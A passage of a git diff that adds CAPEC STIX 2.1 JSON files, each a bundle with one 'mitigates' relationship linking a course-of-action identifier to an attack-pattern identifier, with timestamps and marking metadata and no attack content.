b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--100a329d-ba83-48b7-ac8d-0ea6a006ae33", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json new file mode 100644 index 0000000000000000000000000000000000000000..8a4a332e0ce7c6923a484c3ac78da1c78a5e2086 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--78723478-3982-46fc-9027-e48c31d70203", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "spec_version": "2.1", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json new file mode 100644 index 0000000000000000000000000000000000000000..40f9bd14027b158d7656617b8c4f8f423b93d6e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2c257783-258d-47b1-97c1-566909d7d97c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json new file mode 100644 index 0000000000000000000000000000000000000000..5b92c5d09af10c541e9164a6666de995da081621 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--bc3f067a-0d3e-41ff-acd1-f593183332f5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02109430-cdab-456f-831f-cbf8dc34209a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "spec_version": "2.1", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json new file mode 100644 index 0000000000000000000000000000000000000000..3089da4e024dd729a25befe4efe780f807195bb6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--1538e0ff-7553-418d-9bb6-e72e8bec9430", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02819a54-8939-497c-b2eb-faaac80cabf0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json new file mode 100644 index 0000000000000000000000000000000000000000..f1eb784bf844e5d3a1c35ab61ec5a5146ec19adb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e7007394-fd72-4915-a33e-34fd8f184fba", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "spec_version": "2.1", + "target_ref": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a.json new file mode 100644 index 0000000000000000000000000000000000000000..e29e11adfd99f0bba96f612436cb4302361b55cc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c743a406-3ceb-470b-869b-201fc6da576a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json new file mode 100644 index 0000000000000000000000000000000000000000..bca9ec53dbb9dd42403840a3706c3e803e61e5ed --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b07042cd-1d26-4a72-a7eb-60e5ccd7d47f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ed0f42c-e94a-4d92-be95-06df4d69c7b7", + "spec_version": "2.1", + "target_ref": "attack-pattern--36a2f844-0c20-41d7-9a10-66f1e4c43db8", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json new file mode 100644 index 0000000000000000000000000000000000000000..eced1b172341c8900256627f583db5d67a41ceb8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9799f1a3-a7f8-4ef6-a910-059a197573cf", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03ca0e49-f51b-444a-bfae-ac04853513a4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json new file mode 100644 index 0000000000000000000000000000000000000000..3a4a7153bb3cbedf1abf835855c476a3d6c7a0ef --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--7d76ba1b-1632-49b3-860d-d55fd332bb7a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03fec1aa-4921-455b-89f5-01af59405338", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04107b1a-930b-4176-95d0-e7209880a9b9.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04107b1a-930b-4176-95d0-e7209880a9b9.json new file mode 100644 index 0000000000000000000000000000000000000000..57d2331946b478af2d482421b4741892745e4342 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04107b1a-930b-4176-95d0-e7209880a9b9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--cebde274-77fd-4b89-8f61-5f1b4d4de532", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04107b1a-930b-4176-95d0-e7209880a9b9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49f16706-cef6-476c-902e-ca7d425a38d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json new file mode 100644 index 0000000000000000000000000000000000000000..21aec0577936298ca0253cfc209d08948da74b28 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ae81c3c5-2fcb-4ea2-9b8f-40180c07cf6e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04308827-581a-464a-8378-efed9a9a7476", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "spec_version": "2.1", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json new file mode 100644 index 0000000000000000000000000000000000000000..ab10970bfce6278f01c3c7ac527a0503f1bd3d98 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5e76b80a-f00b-4156-acb4-73523ec3307b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04696e3f-623a-46fd-bd0e-c253d001cba3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json new file mode 100644 index 0000000000000000000000000000000000000000..7bc1a90473553d88958f89194e171a9482e235d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--39d33168-8edf-4697-8417-6ca5e0968fe7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json new file mode 100644 index 0000000000000000000000000000000000000000..c97d2eceac72acbc32196592e639be58669a5bef --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9ee338e2-2cb0-4640-90e8-a150cfe7fc5d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04915a3b-b205-4fc6-8701-3035bdceff35", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04be062d-d511-410f-99c9-f9f7993a39af.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04be062d-d511-410f-99c9-f9f7993a39af.json new file mode 100644 index 0000000000000000000000000000000000000000..40050067d93c9c72dc38f64b4c2130c8208de149 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04be062d-d511-410f-99c9-f9f7993a39af.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--40c5a7e3-f565-4db4-bf9a-26bfac2e9453", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04be062d-d511-410f-99c9-f9f7993a39af", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "spec_version": "2.1", + "target_ref": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json new file mode 100644 index 0000000000000000000000000000000000000000..4f81a17a8cf780c5220f3949e8af6695490289db --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--87e7395b-9c1f-4368-9510-1505fce2da05", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04f00f04-9695-4b7c-9593-29b78e51dda7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json new file mode 100644 index 0000000000000000000000000000000000000000..3a4ccbf2aa9a13640178f487c92dc17d6918cf18 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fb6b7038-d937-4f92-b788-1026efb0cd1e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "spec_version": "2.1", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json new file mode 100644 index 0000000000000000000000000000000000000000..eb26d0ba4fbec9077dcc8931bc962d476feb60fc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--8dadfe82-ed3b-4ea8-bd09-10cb82c71156", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--059701ef-8061-47b4-a433-8f83fe7a16ae", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82858217-6c8b-48b3-950e-5d75c257b76d", + "spec_version": "2.1", + "target_ref": "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json new file mode 100644 index 0000000000000000000000000000000000000000..16230472d81b6d8536f2c204205219e6a88fb70d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--967fdd29-35b2-41c9-ac45-02632a81fa28", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json new file mode 100644 index 0000000000000000000000000000000000000000..331cc9c13a384504462dec17376eeddc843ce5f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--8da8bfa4-5df2-47f6-8bc1-b591518f1b12", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json new file mode 100644 index 0000000000000000000000000000000000000000..9b72be2cc8ddd0f351102feceee2f8378731225e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--efc053ab-23dd-49d2-9c8f-e9bfaebca119", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0606876e-24f7-4cdd-812b-44db26e0f72b.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0606876e-24f7-4cdd-812b-44db26e0f72b.json new file mode 100644 index 0000000000000000000000000000000000000000..988e8c608b8cabe493cc1e303f27b44abbe75c3b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0606876e-24f7-4cdd-812b-44db26e0f72b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--03c17ace-f581-4472-9d78-d03ef8b924ff", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0606876e-24f7-4cdd-812b-44db26e0f72b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json new file mode 100644 index 0000000000000000000000000000000000000000..b94542df3fe49c3914f0848f77f23a4193641d60 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--a67fba86-146e-466d-8351-4c5644c63b2b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9", + "modified": 